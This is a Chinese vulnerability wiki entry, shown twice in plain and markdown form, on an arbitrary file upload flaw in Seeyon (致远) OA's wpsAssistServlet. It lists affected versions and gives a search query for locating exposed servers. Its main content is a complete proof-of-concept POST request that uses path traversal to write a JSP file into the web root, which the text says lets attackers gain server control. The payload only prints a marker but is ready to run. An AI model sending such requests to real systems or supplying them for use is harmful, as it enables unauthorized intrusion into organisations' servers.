fofamini-wiki

登录白背景

源码

致远OA wpsAssistServlet存在任意文件上传漏洞

一、漏洞简介

致远OA wpsAssistServlet存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。

二、影响版本

致远OA A6+
致远OA A8+

三、资产测绘

hunterapp.name="致远 OA"
特征

四、漏洞复现

POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/01014.jsp&fileId=2 HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=a4d7586ac9d50625dee11e86fa69bc71
Content-Length: 217

--a4d7586ac9d50625dee11e86fa69bc71
Content-Disposition: form-data; name="upload"; filename="123.xls"
Content-Type: application/vnd.ms-excel

<% out.println("215882935");%>  
--a4d7586ac9d50625dee11e86fa69bc71--

文件上传位置

/01014.jsp

原文: https://www.yuque.com/xiaokp7/ocvun2/rqqhruefohcqeyuz

# 致远OA wpsAssistServlet存在任意文件上传漏洞

# 一、漏洞简介
致远OA wpsAssistServlet存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。

# 二、影响版本
+ 致远OA A6+
+ 致远OA A8+

# 三、资产测绘
+ hunter`app.name="致远 OA"`
+ 特征

![1702654441882-426cbc35-3df7-455b-a5e9-5f459acb5133.png](./img/16roJi0grfi2jqJn/1702654441882-426cbc35-3df7-455b-a5e9-5f459acb5133-677286.png)

# 四、漏洞复现
```java
POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/01014.jsp&fileId=2 HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data; boundary=a4d7586ac9d50625dee11e86fa69bc71
Content-Length: 217

--a4d7586ac9d50625dee11e86fa69bc71
Content-Disposition: form-data; name="upload"; filename="123.xls"
Content-Type: application/vnd.ms-excel

<% out.println("215882935");%>  
--a4d7586ac9d50625dee11e86fa69bc71--
```

![1713883306791-2d2a1b31-d968-4bec-86a6-026f9614675b.png](./img/16roJi0grfi2jqJn/1713883306791-2d2a1b31-d968-4bec-86a6-026f9614675b-584732.png)

文件上传位置

```java
/01014.jsp
```

![1713883331181-fc3139b6-7698-449a-91a4-a584c7bf0924.png](./img/16roJi0grfi2jqJn/1713883331181-fc3139b6-7698-449a-91a4-a584c7bf0924-096887.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rqqhruefohcqeyuz>